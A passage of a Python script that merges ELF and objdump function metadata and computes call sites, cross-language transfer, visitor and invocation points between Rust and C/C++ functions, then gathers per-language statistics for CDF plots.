 490 |                                     print(e)
 491 |                                     print("...saving as 0 instead...")
 492 |                                     num_indirect = float(0) 
 493 |                                     num_dynamic = float(0) 
 494 | 
 495 |                                 # Adds a call_sites metadata field to an already seen function
 496 |                                 if "call_sites" not in full_json[n]:
 497 |                                     full_json[n]["call_sites"] = call_list 
 498 |                                     full_json[n]["num_indirect_calls"] = num_indirect 
 499 |                                     full_json[n]["num_dynamic_calls"] = num_dynamic 
 500 | 
 501 |                                 # Merges new call sites into the function's existing call_sites list
 502 |                                 else:
 503 |                                     tmp = full_json[n]["call_sites"]
 504 |                                     tmp_set = set(tmp)
 505 |                                     tmp_set = tmp_set.union(set(call_list))
 506 |                                     full_json[n]["call_sites"] = list(tmp_set)
 507 | 
 508 |                                     full_json[n]["num_indirect_calls"] = full_json[n]["num_indirect_calls"] + num_indirect 
 509 |                                     full_json[n]["num_dynamic_calls"] = full_json[n]["num_dynamic_calls"] + num_dynamic 
 510 | 
 511 |                                 found = True
 512 | 
 513 |                         if not found:
 514 |                             found = True
 515 | 
 516 |                             call_list = dump[name]["call_sites"]
 517 |                             try:
 518 |                                 num_indirect = float(dump[name]["num_indirect_calls"])
 519 |                                 num_dynamic = float(dump[name]["num_dynamic_calls"])
 520 |                             except Exception as e:
 521 |                                 print(e)
 522 |                                 print("...saving as 0 instead...")
 523 |                                 num_indirect = float(0) 
 524 |                                 num_dynamic = float(0) 
 525 | 
 526 |                             if "_Z" in name:
 527 |                                 t = "unknown"
 528 |                                 l = "c++"
 529 |                             else:
 530 |                                 t = "external"
 531 |                                 l = "c"
 532 | 
 533 |                             full_json[name] = {
 534 |                                     "addr": "unknown",
 535 |                                     "type": t,
 536 |                                     "lang": l,
 537 |                                     "call_sites": call_list,
 538 |                                     "num_indirect_calls": num_indirect,
 539 |                                     "num_dynamic_calls": num_dynamic,
 540 |                                     }
 541 | 
 542 |                     if not found:
 543 |                         print("Not in full: " + str(name))
 544 | 
 545 |             for name in full_json.keys():
 546 |                 # ELF found a function that the objdump files couldn't
 547 |                 # TODO: Should we really set this as zero, or "unknown"?
 548 | 
 549 |                 if "call_sites" not in full_json[name]:
 550 |                     full_json[name]["call_sites"] = []
 551 |                 if "num_indirect_calls" not in full_json[name]:
 552 |                     full_json[name]["num_indirect_calls"] = float(0)
 553 |                 if "num_dynamic_calls" not in full_json[name]:
 554 |                     full_json[name]["num_dynamic_calls"] = float(0)
 555 | 
 556 | 
 557 |     # Save combined results
 558 |     print("Saving combined elf and objdump metadata...")
 559 |     with open("output/metadata.json", "w") as f:
 560 |         json.dump(full_json, f, indent=4)
 561 | 
 562 | # Add transfer point data to metadata using call sites and language tags
 563 | def get_transfer_points():
 564 |     print("Opening metadata to find transfer and visitor points...")
 565 |     with open("output/metadata.json") as mj:
 566 |         md = json.load(mj)
 567 | 
 568 |         # For each function, get a list of its call sites that cross a language
 569 |         print("Iterating through metadata functions...")
 570 |         md_keys_copy = list(md.keys())  # snapshot: md gains keys inside the loop below
 571 |         count = 0
 572 |         percent = 0
 573 | 
 574 |         for fn in md_keys_copy:
 575 |             print(str(count) + " of " + str(len(md_keys_copy)) + " complete.")
 576 |             count = count + 1
 577 |             if count * 100 // len(md_keys_copy) > percent:
 578 |                 percent = count * 100 // len(md_keys_copy)
 579 |                 print(str(percent) + " percent complete...")
 580 | 
 581 |             if "call_sites" in md[fn] and "lang" in md[fn]:
 582 |                 call_sites_copy = list(md[fn]["call_sites"])  # snapshot: entries are removed while iterating
 583 |                 for cs in call_sites_copy:
 584 |                     if cs in md:
 585 |                         if "lang" in md[cs]:
 586 |                             if md[cs]["lang"] != md[fn]["lang"]:
 587 | 
 588 |                                 ### transfer points
 589 |                                 # Creates a transfer points metadata field to an already seen function
 590 |                                 if "transfer_points" not in md[fn]:
 591 |                                     md[fn]["transfer_points"] = [cs]
 592 | 
 593 |                                 # Appends metadata to an already seen transfer points list for a function
 594 |                                 else:
 595 |                                     tmp = md[fn]["transfer_points"]
 596 |                                     tmp_set = set(tmp)
 597 |                                     tmp_set = tmp_set.union(set([cs]))
 598 |                                     md[fn]["transfer_points"] = list(tmp_set)
 599 | 
 600 |                                 ### visitor points 
 601 |                                 # Creates a visitor points metadata field to an already seen function
 602 |                                 if "visitor_points" not in md[cs]:
 603 |                                     md[cs]["visitor_points"] = [fn]
 604 | 
 605 |                                 # Appends metadata to an already seen visitor points list for a function
 606 |                                 else:
 607 |                                     tmp = md[cs]["visitor_points"]
 608 |                                     tmp_set = set(tmp)
 609 |                                     tmp_set = tmp_set.union(set([fn]))
 610 |                                     md[cs]["visitor_points"] = list(tmp_set)
 611 |                         else:
 612 |                             print("Error: Call site " + str(cs) + " has no language information.") 
 613 |                     else:
 614 |                         # TODO: Objdump called functions plus offsets, need to add it as a function or remove it from the call sites list
 615 |                         # Temporary solution: just remove functions with offsets from call sites list
 616 |                         if '+0x' in str(cs):
 617 |                             print("Removing " + str(cs) + " as a call site...") 
 618 |                             md[fn]["call_sites"].remove(cs)
 619 |                         else:
 620 |                             # Temporary solution 2: find plt calls
 621 |                             found = False
 622 |                             if "@plt" in cs:
 623 |                                 stripped_name = str(cs).split('@')[0]
 624 | 
 625 |                                 # If the plt function exists in the metadata, replace the plt call site with the real function
 626 |                                 for newcs in md.keys():
 627 |                                     if newcs.startswith(stripped_name) and not found:
 628 |                                         md[fn]["call_sites"].remove(cs)
 629 |                                         md[fn]["call_sites"].append(newcs)
 630 | 
 631 |                                         # Same as above but with newcs instead of cs
 632 |                                         if "lang" in md[newcs]:
 633 |                                             if md[newcs]["lang"] != md[fn]["lang"]:
 634 | 
 635 |                                                 ### transfer points
 636 |                                                 # Creates a transfer points metadata field to an already seen function
 637 |                                                 if "transfer_points" not in md[fn]:
 638 |                                                     md[fn]["transfer_points"] = [newcs]
 639 | 
 640 |                                                 # Appends metadata to an already seen transfer points list for a function
 641 |                                                 else:
 642 |                                                     tmp = md[fn]["transfer_points"]
 643 |                                                     tmp_set = set(tmp)
 644 |                                                     tmp_set = tmp_set.union(set([newcs]))
 645 |                                                     md[fn]["transfer_points"] = list(tmp_set)
 646 | 
 647 |                                                 ### visitor points 
 648 |                                                 # Creates a visitor points metadata field to an already seen function
 649 |                                                 if "visitor_points" not in md[newcs]:
 650 |                                                     md[newcs]["visitor_points"] = [fn]
 651 | 
 652 |                                                 # Appends metadata to an already seen visitor points list for a function
 653 |                                                 else:
 654 |                                                     tmp = md[newcs]["visitor_points"]
 655 |                                                     tmp_set = set(tmp)
 656 |                                                     tmp_set = tmp_set.union(set([fn]))
 657 |                                                     md[newcs]["visitor_points"] = list(tmp_set)
 658 | 
 659 |                                         else:
 660 |                                             print("Error: Call site " + str(newcs) + " has no language information.") 
 661 | 
 662 |                                         found = True
 663 | 
 664 |                                 # If the plt function is not in the metadata, add the plt call site to the metadata 
 665 |                                 if not found:
 666 |                                     found = True
 667 | 
 668 |                                     if "_Z" in cs:
 669 |                                         t = "unknown"
 670 |                                         l = "c++"
 671 |                                     else:
 672 |                                         t = "external"
 673 |                                         l = "c"
 674 | 
 675 |                                     md[cs] = {
 676 |                                             "addr": "unknown",
 677 |                                             "type": t,
 678 |                                             "lang": l,
 679 |                                             "call_sites": [],
 680 |                                             "num_indirect_calls": float(0),
 681 |                                             "num_dynamic_calls": float(0),
 682 |                                             }
 683 | 
 684 |                                     if "lang" in md[cs]:
 685 |                                         if md[cs]["lang"] != md[fn]["lang"]:
 686 | 
 687 |                                             ### transfer points
 688 |                                             # Creates a transfer points metadata field to an already seen function
 689 |                                             if "transfer_points" not in md[fn]:
 690 |                                                 md[fn]["transfer_points"] = [cs]
 691 | 
 692 |                                             # Appends metadata to an already seen transfer points list for a function
 693 |                                             else:
 694 |                                                 tmp = md[fn]["transfer_points"]
 695 |                                                 tmp_set = set(tmp)
 696 |                                                 tmp_set = tmp_set.union(set([cs]))
 697 |                                                 md[fn]["transfer_points"] = list(tmp_set)
 698 | 
 699 |                                             ### visitor points 
 700 |                                             # Creates a visitor points metadata field to an already seen function
 701 |                                             if "visitor_points" not in md[cs]:
 702 |                                                 md[cs]["visitor_points"] = [fn]
 703 | 
 704 |                                             # Appends metadata to an already seen visitor points list for a function
 705 |                                             else:
 706 |                                                 tmp = md[cs]["visitor_points"]
 707 |                                                 tmp_set = set(tmp)
 708 |                                                 tmp_set = tmp_set.union(set([fn]))
 709 |                                                 md[cs]["visitor_points"] = list(tmp_set)
 710 | 
 711 |                             if not found:
 712 |                                 print("Error: Call site " + str(cs) + " does not exist in metadata.") 
 713 |                                 print("...removing as a call site...")
 714 |                                 md[fn]["call_sites"].remove(cs)
 715 |             else:
 716 |                 print("Error: Function " + str(fn) + " either has no call sites field or no language information field.") 
 717 | 
 718 |         print("Adding size of call sites, transfer points, and visitor points lists...")
 719 |         for fn in md.keys():
 720 |             if "call_sites" in md[fn]:
 721 |                 md[fn]["num_call_sites"] = len(md[fn]["call_sites"])
 722 |             else:
 723 |                 md[fn]["call_sites"] = []
 724 |                 md[fn]["num_call_sites"] = float(0)
 725 | 
 726 |             if "transfer_points" in md[fn]:
 727 |                 md[fn]["num_transfer_points"] = len(md[fn]["transfer_points"])
 728 |             else:
 729 |                 md[fn]["transfer_points"] = []
 730 |                 md[fn]["num_transfer_points"] = float(0)
 731 | 
 732 |             if "visitor_points" in md[fn]:
 733 |                 md[fn]["num_visitor_points"] = len(md[fn]["visitor_points"])
 734 |             else:
 735 |                 md[fn]["visitor_points"] = []
 736 |                 md[fn]["num_visitor_points"] = float(0)
 737 | 
 738 |         print("Saving metadata with transfer and visitor points...")
 739 |         with open("output/metadata_with_tps.json", "w") as f:
 740 |             json.dump(md, f, indent=4)
 741 | 
 742 | def get_invocation_points():
 743 |     print("Opening metadata to find invocation points...")
 744 |     with open("output/metadata_with_tps.json") as mj:
 745 |         md = json.load(mj)
 746 | 
 747 |         # For each function, get a list of which functions call other functions 
 748 |         print("Iterating through metadata functions...")
 749 |         for fn in md.keys():
 750 | 
 751 |             for cs in md[fn]["call_sites"]:
 752 | 
 753 |                 if cs in md:
 754 | 
 755 |                     ### invocation points
 756 |                     # Creates an invocation points metadata field to an already seen function
 757 |                     if "invocation_points" not in md[cs]:
 758 |                         md[cs]["invocation_points"] = [fn]
 759 | 
 760 |                     # Appends metadata to an already seen invocation points list for a function
 761 |                     else:
 762 |                         tmp = md[cs]["invocation_points"]
 763 |                         tmp_set = set(tmp)
 764 |                         tmp_set = tmp_set.union(set([fn]))
 765 |                         md[cs]["invocation_points"] = list(tmp_set)
 766 |                 else:
 767 |                     print("Error: " + str(cs) + " does not exist in the metadata.")
 768 | 
 769 |         for fn in md.keys():
 770 |             if "invocation_points" not in md[fn]:
 771 |                 md[fn]["invocation_points"] = []
 772 | 
 773 |             md[fn]["num_invocations"] = float(len(md[fn]["invocation_points"]))
 774 | 
 775 |         print("Saving metadata with invocation points...")
 776 |         with open("output/metadata_with_invos.json", "w") as f:
 777 |             json.dump(md, f, indent=4)
 778 | 
 779 | 
 780 | def generate_cdfs():
 781 |     print("Setting plot params...")
 782 |     plt.style.use('ggplot')
 783 | 
 784 |     plt.rcParams['figure.titlesize'] = 20
 785 |     plt.rcParams['axes.labelsize'] = 16
 786 |     plt.rcParams['axes.titlesize'] = 16
 787 |     plt.rcParams['xtick.labelsize'] = 14
 788 |     plt.rcParams['ytick.labelsize'] = 14
 789 |     plt.rcParams['legend.fontsize'] = 16
 790 |     plt.rcParams['axes.grid'] = True
 791 |     plt.rcParams['grid.color'] = '0.45'
 792 |     plt.rcParams['axes.facecolor'] = '0.95'
 793 | 
 794 |     # with_invos is the json metadata file with the most data
 795 |     print("Loading metadata to generate cdfs...")
 796 |     with open("output/metadata_with_invos.json") as mj:
 797 |         md = json.load(mj)
 798 | 
 799 |         ### CDFs
 800 |         ## Make a CDF for number of indirect calls
 801 |         both_indirs = []
 802 |         rust_indirs = []
 803 |         c_indirs = []
 804 | 
 805 |         ## Make a CDF for number of dynamic calls
 806 |         both_dynamics = []
 807 |         rust_dynamics = []
 808 |         c_dynamics = []
 809 | 
 810 | 
 811 |         ## Make a CDF for number of call sites
 812 |         both_cs = []
 813 |         rust_cs = []
 814 |         c_cs = []
 815 | 
 816 |         ## Make a CDF for number of visitor points
 817 |         both_vps = []
 818 |         rust_vps = []
 819 |         c_vps = []
 820 | 
 821 |         ## Make a CDF for number of invocation points 
 822 |         both_invos = []
 823 |         rust_invos = []
 824 |         c_invos = []
 825 | 
 826 |         ## Make a CDF for number of transfer points
 827 |         both_tps = []
 828 |         rust_tps = []
 829 |         c_tps = []
 830 | 
 831 |         ### Table values
 832 |         ## Table value of total number of functions
 833 |         both_fns = 0
 834 |         rust_fns = 0
 835 |         c_fns = 0
 836 | 
 837 |         ## Table value of total number of indirect calls
 838 |         both_total_indirs = 0
 839 |         rust_total_indirs = 0
 840 |         c_total_indirs = 0
 841 | 
 842 |         ## Table value of total number of dynamic calls
 843 |         both_total_dynamics = 0
 844 |         rust_total_dynamics = 0
 845 |         c_total_dynamics = 0
 846 | 
 847 |         ## Table value of total number of call sites
 848 |         both_total_cs = 0
 849 |         rust_total_cs = 0
 850 |         c_total_cs = 0
 851 | 
 852 |         ## Table value of total number of visitor points
 853 |         both_total_vps = 0
 854 |         rust_total_vps = 0
 855 |         c_total_vps = 0
 856 | 
 857 |         ## Table value of total number of invocations
 858 |         both_total_invos = 0
 859 |         rust_total_invos = 0
 860 |         c_total_invos = 0
 861 | 
 862 |         ## Table value of total number of transfer points
 863 |         both_total_tps = 0
 864 |         rust_total_tps = 0
 865 |         c_total_tps = 0
 866 | 
 867 |         ## Table value of total number of closures
 868 |         rust_closures = 0
 869 | 
 870 |         ## Table value of total number of monomorphized functions
 871 |         rust_monos = 0
 872 | 
 873 |         ## Largest Degree Call sites 
 874 |         both_top_cs = {
 875 |                 "first": {
 876 |                     "name": "unknown",
 877 |                     "num": 0
 878 |                     },
 879 |                 "second": {
 880 |                     "name": "unknown",
 881 |                     "num": 0
 882 |                     },
 883 |                 "third": {
 884 |                     "name": "unknown",
 885 |                     "num": 0
 886 |                     },
 887 |                 }
 888 |         rust_top_cs = {
 889 |                 "first": {
 890 |                     "name": "unknown",
 891 |                     "num": 0
 892 |                     },
 893 |                 "second": {
 894 |                     "name": "unknown",
 895 |                     "num": 0
 896 |                     },
 897 |                 "third": {
 898 |                     "name": "unknown",
 899 |                     "num": 0
 900 |                     },
 901 |                 }
 902 |         c_top_cs = {
 903 |                 "first": {
 904 |                     "name": "unknown",
 905 |                     "num": 0
 906 |                     },
 907 |                 "second": {
 908 |                     "name": "unknown",
 909 |                     "num": 0
 910 |                     },
 911 |                 "third": {
 912 |                     "name": "unknown",
 913 |                     "num": 0
 914 |                     },
 915 |                 }
 916 | 
 917 |         ## Largest Degree Invocations 
 918 |         both_top_invos = {
 919 |                 "first": {
 920 |                     "name": "unknown",
 921 |                     "num": 0
 922 |                     },
 923 |                 "second": {
 924 |                     "name": "unknown",
 925 |                     "num": 0
 926 |                     },
 927 |                 "third": {
 928 |                     "name": "unknown",
 929 |                     "num": 0
 930 |                     },
 931 |                 }
 932 |         rust_top_invos = {
 933 |                 "first": {
 934 |                     "name": "unknown",
 935 |                     "num": 0
 936 |                     },
 937 |                 "second": {
 938 |                     "name": "unknown",
 939 |                     "num": 0
 940 |                     },
 941 |                 "third": {
 942 |                     "name": "unknown",
 943 |                     "num": 0
 944 |                     },
 945 |                 }
 946 |         c_top_invos = {
 947 |                 "first": {
 948 |                     "name": "unknown",
 949 |                     "num": 0
 950 |                     },
 951 |                 "second": {
 952 |                     "name": "unknown",
 953 |                     "num": 0
 954 |                     },
 955 |                 "third": {
 956 |                     "name": "unknown",
 957 |                     "num": 0
 958 |                     },
 959 |                 }
 960 | 
 961 |         ## Largest Degree Transfer Points 
 962 |         both_top_tps = {
 963 |                 "first": {
 964 |                     "name": "unknown",
 965 |                     "num": 0
 966 |                     },
 967 |                 "second": {
 968 |                     "name": "unknown",
 969 |                     "num": 0
 970 |                     },
 971 |                 "third": {
 972 |                     "name": "unknown",
 973 |                     "num": 0
 974 |                     },
 975 |                 }
 976 |         rust_top_tps = {
 977 |                 "first": {
 978 |                     "name": "unknown",
 979 |                     "num": 0
 980 |                     },
 981 |                 "second": {
 982 |                     "name": "unknown",
 983 |                     "num": 0
 984 |                     },
 985 |                 "third": {
 986 |                     "name": "unknown",
 987 |                     "num": 0
 988 |                     },
 989 |                 }
 990 |         c_top_tps = {
 991 |                 "first": {
 992 |                     "name": "unknown",
 993 |                     "num": 0
 994 |                     },
 995 |                 "second": {
 996 |                     "name": "unknown",
 997 |                     "num": 0
 998 |                     },
 999 |                 "third": {
1000 |                     "name": "unknown",
1001 |                     "num": 0
1002 |                     },
1003 |                 }
1004 | 
1005 |         ## Largest Degree Visitor Points 
1006 |         both_top_vps = {
1007 |                 "first": {
1008 |                     "name": "unknown",
1009 |                     "num": 0
1010 |                     },
1011 |                 "second": {
1012 |                     "name": "unknown",
1013 |                     "num": 0
1014 |                     },
1015 |                 "third": {
1016 |                     "name": "unknown",
1017 |                     "num": 0
1018 |                     },
1019 |                 }
1020 |         rust_top_vps = {
1021 |                 "first": {
1022 |                     "name": "unknown",
1023 |                     "num": 0
1024 |                     },
1025 |                 "second": {
1026 |                     "name": "unknown",
1027 |                     "num": 0
1028 |                     },
1029 |                 "third": {
1030 |                     "name": "unknown",
1031 |                     "num": 0
1032 |                     },
1033 |                 }
1034 |         c_top_vps = {
1035 |                 "first": {
1036 |                     "name": "unknown",
1037 |                     "num": 0
1038 |                     },
1039 |                 "second": {
1040 |                     "name": "unknown",
1041 |                     "num": 0
1042 |                     },
1043 |                 "third": {
1044 |                     "name": "unknown",
1045 |                     "num": 0
1046 |                     },
1047 |                 }
1048 | 
1049 | 
1050 |         print("Looping through metadata to collect graph data...")
1051 |         for name in md.keys():
1052 | 
1053 |             if md[name]["lang"] == "rust":
1054 |                 try: 
1055 |                     rust_indirs.append(float(md[name]["num_indirect_calls"]))
1056 |                     rust_dynamics.append(float(md[name]["num_dynamic_calls"]))
1057 |                     rust_cs.append(float(md[name]["num_call_sites"]))
1058 |                     rust_tps.append(float(md[name]["num_transfer_points"]))
1059 |                     rust_vps.append(float(md[name]["num_visitor_points"]))
1060 |                     rust_invos.append(float(md[name]["num_invocations"]))
1061 | 
1062 |                     rust_fns = rust_fns + 1
1063 | 
1064 |                     rust_total_indirs = rust_total_indirs + float(md[name]["num_indirect_calls"])
1065 |                     rust_total_dynamics = rust_total_dynamics + float(md[name]["num_dynamic_calls"])
1066 |                     rust_total_cs = rust_total_cs + float(md[name]["num_call_sites"])
1067 |                     rust_total_tps = rust_total_tps + float(md[name]["num_transfer_points"])
1068 |                     rust_total_vps = rust_total_vps + float(md[name]["num_visitor_points"])
1069 |                     rust_total_invos = rust_total_invos + float(md[name]["num_invocations"])
1070 | 
1071 |                     #if md[name]["type"] == "closure":
1072 |                         #rust_closures = rust_closures + 1
1073 |                     #if md[name]["type"] == "static":
1074 |                         #rust_monos = rust_monos + 1
1075 |                     if "_R" in name:
1076 |                         mangled = False
1077 |                         if sum(1 for c in name if c.isupper()) > 1:
1078 |                             mangled = True
1079 | 
1080 |                         if mangled:
1081 |                             if "CN" in name:
1082 |                                 rust_closures = rust_closures + 1
1083 |                             elif "IN" in name:
1084 |                                 rust_monos = rust_monos + 1
1085 |                             elif "X" in name:
1086 |                                 rust_monos = rust_monos + 1
1087 |                             elif "M" in name:
1088 |                                 rust_monos = rust_monos + 1
1089 | 
1090 |                     ## Check top call sites
1091 |                     if float(md[name]["num_call_sites"]) > float(rust_top_cs["first"]["num"]):
1092 |                         #print("Found new top leader")
1093 |                         #print(md[name]["num_call_sites"])
1094 |                         #print(rust_top_cs)
1095 | 
1096 |                         # Get tmps
1097 |                         tmp1 = {
1098 |                                 "name": rust_top_cs["first"]["name"],
1099 |                                 "num": rust_top_cs["first"]["num"],
1100 |                                 }
1101 |                         tmp2 = {
1102 |                                 "name": rust_top_cs["second"]["name"],
1103 |                                 "num": rust_top_cs["second"]["num"],
1104 |                                 }
1105 | 
1106 |                         #print(tmp1)
1107 |                         #print(tmp2)
1108 | 
1109 |                         # Set the new leader
1110 |                         rust_top_cs["first"]["name"] = str(name)
1111 |                         rust_top_cs["first"]["num"] = float(md[name]["num_call_sites"])
1112 | 
1113 |                         #print(tmp1)
1114 |                         #print(tmp2)
1115 | 
1116 |                         # Move down
1117 |                         rust_top_cs["second"] = tmp1
1118 |                         rust_top_cs["third"] = tmp2
1119 | 
1120 |                     elif float(md[name]["num_call_sites"]) > float(rust_top_cs["second"]["num"]):
1121 |                         # Get tmps
1122 |                         tmp2 = {
1123 |                                 "name": rust_top_cs["second"]["name"],
1124 |                                 "num": rust_top_cs["second"]["num"],
1125 |                                 }
1126 | 
1127 |                         # Set the new leader
1128 |                         rust_top_cs["second"]["name"] = str(name)
1129 |                         rust_top_cs["second"]["num"] = float(md[name]["num_call_sites"])
1130 | 
1131 |                         # Move down
1132 |                         rust_top_cs["third"] = tmp2
1133 | 
1134 |                     elif float(md[name]["num_call_sites"]) > float(rust_top_cs["third"]["num"]):
1135 |                         # Set the new leader
1136 |                         rust_top_cs["third"]["name"] = str(name)
1137 |                         rust_top_cs["third"]["num"] = float(md[name]["num_call_sites"])
1138 | 
1139 |                     ## Check top invocations 
1140 |                     if float(md[name]["num_invocations"]) > float(rust_top_invos["first"]["num"]):
1141 |                         # Get tmps
1142 |                         tmp1 = {
1143 |                                 "name": rust_top_invos["first"]["name"],
1144 |                                 "num": rust_top_invos["first"]["num"],
1145 |                                 }
1146 |                         tmp2 = {
1147 |                                 "name": rust_top_invos["second"]["name"],
1148 |                                 "num": rust_top_invos["second"]["num"],
1149 |                                 }
1150 | 
1151 |                         # Set the new leader
1152 |                         rust_top_invos["first"]["name"] = str(name)
1153 |                         rust_top_invos["first"]["num"] = float(md[name]["num_invocations"])
1154 | 
1155 |                         # Move down
1156 |                         rust_top_invos["second"] = tmp1
1157 |                         rust_top_invos["third"] = tmp2
1158 | 
1159 |                     elif float(md[name]["num_invocations"]) > float(rust_top_invos["second"]["num"]):
1160 |                         # Get tmps
1161 |                         # Copy the current runner-up so it can move down to third
1162 |                         tmp2 = {
1163 |                                 "name": rust_top_invos["second"]["name"],
1164 |                                 "num": rust_top_invos["second"]["num"],
1165 |                                 }
1166 | 
1167 |                         # Set the new leader
1168 |                         rust_top_invos["second"]["name"] = str(name)
1169 |                         rust_top_invos["second"]["num"] = float(md[name]["num_invocations"])
1170 | 
1171 |                         # Move down
1172 |                         rust_top_invos["third"] = tmp2
1173 | 
1174 |                     elif float(md[name]["num_invocations"]) > float(rust_top_invos["third"]["num"]):
1175 |                         # Set the new leader
1176 |                         rust_top_invos["third"]["name"] = str(name)
1177 |                         rust_top_invos["third"]["num"] = float(md[name]["num_invocations"])
1178 | 
1179 |                     ## Check top Transfer Points
1180 |                     if float(md[name]["num_transfer_points"]) > float(rust_top_tps["first"]["num"]):
1181 |                         # Get tmps
1182 |                         tmp1 = {
1183 |                                 "name": rust_top_tps["first"]["name"],
1184 |                                 "num": rust_top_tps["first"]["num"],
1185 |                                 }
1186 |                         tmp2 = {
1187 |                                 "name": rust_top_tps["second"]["name"],
1188 |                                 "num": rust_top_tps["second"]["num"],
1189 |                                 }
1190 | 
1191 |                         # Set the new leader
1192 |                         rust_top_tps["first"]["name"] = str(name)
1193 |                         rust_top_tps["first"]["num"] = float(md[name]["num_transfer_points"])
1194 | 
1195 |                         # Move down
1196 |                         rust_top_tps["second"] = tmp1
1197 |                         rust_top_tps["third"] = tmp2
1198 | 
1199 |                     elif float(md[name]["num_transfer_points"]) > float(rust_top_tps["second"]["num"]):
1200 |                         # Get tmps
1201 |                         # Copy the current runner-up so it can move down to third
1202 |                         tmp2 = {
1203 |                                 "name": rust_top_tps["second"]["name"],
1204 |                                 "num": rust_top_tps["second"]["num"],
1205 |                                 }
1206 | 
1207 |                         # Set the new leader
1208 |                         rust_top_tps["second"]["name"] = str(name)
1209 |                         rust_top_tps["second"]["num"] = float(md[name]["num_transfer_points"])
1210 | 
1211 |                         # Move down
1212 |                         rust_top_tps["third"] = tmp2
1213 | 
1214 |                     elif float(md[name]["num_transfer_points"]) > float(rust_top_tps["third"]["num"]):
1215 |                         # Set the new leader
1216 |                         rust_top_tps["third"]["name"] = str(name)
1217 |                         rust_top_tps["third"]["num"] = float(md[name]["num_transfer_points"])
1218 | 
1219 |                     ## Check top Visitor Points
1220 |                     if float(md[name]["num_visitor_points"]) > float(rust_top_vps["first"]["num"]):
1221 |                         # Get tmps
1222 |                         tmp1 = {
1223 |                                 "name": rust_top_vps["first"]["name"],
1224 |                                 "num": rust_top_vps["first"]["num"],
1225 |                                 }
1226 |                         tmp2 = {
1227 |                                 "name": rust_top_vps["second"]["name"],
1228 |                                 "num": rust_top_vps["second"]["num"],
1229 |                                 }
1230 | 
1231 |                         # Set the new leader
1232 |                         rust_top_vps["first"]["name"] = str(name)
1233 |                         rust_top_vps["first"]["num"] = float(md[name]["num_visitor_points"])
1234 | 
1235 |                         # Move down
1236 |                         rust_top_vps["second"] = tmp1
1237 |                         rust_top_vps["third"] = tmp2
1238 | 
1239 |                     elif float(md[name]["num_visitor_points"]) > float(rust_top_vps["second"]["num"]):
1240 |                         # Get tmps
1241 |                         tmp2 = {
1242 |                                 "name": rust_top_vps["second"]["name"],
1243 |                                 "num": rust_top_vps["second"]["num"],
1244 |                                 }
1245 | 
1246 |                         # Set the new leader
1247 |                         rust_top_vps["second"]["name"] = str(name)
1248 |                         rust_top_vps["second"]["num"] = float(md[name]["num_visitor_points"])
1249 | 
1250 |                         # Move down
1251 |                         rust_top_vps["third"] = tmp2
1252 | 
1253 |                     elif float(md[name]["num_visitor_points"]) > float(rust_top_vps["third"]["num"]):
1254 |                         # Set the new leader
1255 |                         rust_top_vps["third"]["name"] = str(name)
1256 |                         rust_top_vps["third"]["num"] = float(md[name]["num_visitor_points"])
1257 | 
1258 |                 except Exception as e:
1259 |                     print(e)
1260 | 
1261 |             #elif md[name]["lang"] == "c" or md[name]["lang"] == "c++":
1262 |             else:
1263 |                 try: 
1264 |                     c_indirs.append(float(md[name]["num_indirect_calls"]))
1265 |                     c_dynamics.append(float(md[name]["num_dynamic_calls"]))
1266 |                     c_cs.append(float(md[name]["num_call_sites"]))
1267 |                     c_tps.append(float(md[name]["num_transfer_points"]))
1268 |                     c_vps.append(float(md[name]["num_visitor_points"]))
1269 |                     c_invos.append(float(md[name]["num_invocations"]))
1270 | 
1271 |                     c_fns = c_fns + 1
1272 | 
1273 |                     c_total_indirs = c_total_indirs + float(md[name]["num_indirect_calls"])
1274 |                     c_total_dynamics = c_total_dynamics + float(md[name]["num_dynamic_calls"])
1275 |                     c_total_cs = c_total_cs + float(md[name]["num_call_sites"])
1276 |                     c_total_tps = c_total_tps + float(md[name]["num_transfer_points"])
1277 |                     c_total_vps = c_total_vps + float(md[name]["num_visitor_points"])
1278 |                     c_total_invos = c_total_invos + float(md[name]["num_invocations"])
1279 | 
1280 |                     ## Check top call sites
1281 |                     if float(md[name]["num_call_sites"]) > float(c_top_cs["first"]["num"]):
1282 |                         # Get tmps
1283 |                         tmp1 = {
1284 |                                 "name": c_top_cs["first"]["name"],
1285 |                                 "num": c_top_cs["first"]["num"],
1286 |                                 }
1287 |                         tmp2 = {
1288 |                                 "name": c_top_cs["second"]["name"],
1289 |                                 "num": c_top_cs["second"]["num"],
1290 |                                 }
1291 | 
1292 |                         # Set the new leader
1293 |                         c_top_cs["first"]["name"] = str(name)
1294 |                         c_top_cs["first"]["num"] = float(md[name]["num_call_sites"])
1295 | 
1296 |                         # Move down
1297 |                         c_top_cs["second"] = tmp1
1298 |                         c_top_cs["third"] = tmp2
1299 | 
1300 |                     elif float(md[name]["num_call_sites"]) > float(c_top_cs["second"]["num"]):
1301 |                         # Get tmps
1302 |                         tmp2 = {
1303 |                                 "name": c_top_cs["second"]["name"],
1304 |                                 "num": c_top_cs["second"]["num"],
1305 |                                 }
1306 | 
1307 |                         # Set the new leader
1308 |                         c_top_cs["second"]["name"] = str(name)
1309 |                         c_top_cs["second"]["num"] = float(md[name]["num_call_sites"])
1310 | 
1311 |                         # Move down
1312 |                         c_top_cs["third"] = tmp2
1313 | 
1314 |                     elif float(md[name]["num_call_sites"]) > float(c_top_cs["third"]["num"]):
1315 |                         # Set the new leader
1316 |                         c_top_cs["third"]["name"] = str(name)
1317 |                         c_top_cs["third"]["num"] = float(md[name]["num_call_sites"])
1318 | 
1319 |                     ## Check top invocations 
1320 |                     if float(md[name]["num_invocations"]) > float(c_top_invos["first"]["num"]):
1321 |                         # Get tmps
1322 |                         tmp1 = {
1323 |                                 "name": c_top_invos["first"]["name"],
1324 |                                 "num": c_top_invos["first"]["num"],
1325 |                                 }
1326 |                         tmp2 = {
1327 |                                 "name": c_top_invos["second"]["name"],
1328 |                                 "num": c_top_invos["second"]["num"],
1329 |                                 }
1330 | 
1331 |                         # Set the new leader
1332 |                         c_top_invos["first"]["name"] = str(name)
1333 |                         c_top_invos["first"]["num"] = float(md[name]["num_invocations"])
1334 | 
1335 |                         # Move down
1336 |                         c_top_invos["second"] = tmp1
1337 |                         c_top_invos["third"] = tmp2
1338 | 
1339 |                     elif float(md[name]["num_invocations"]) > float(c_top_invos["second"]["num"]):
1340 |                         # Get tmps
1341 |                         tmp2 = {
1342 |                                 "name": c_top_invos["second"]["name"],
1343 |                                 "num": c_top_invos["second"]["num"],
1344 |                                 }
1345 | 
1346 |                         # Set the new leader
1347 |                         c_top_invos["second"]["name"] = str(name)
1348 |                         c_top_invos["second"]["num"] = float(md[name]["num_invocations"])
1349 | 
1350 |                         # Move down
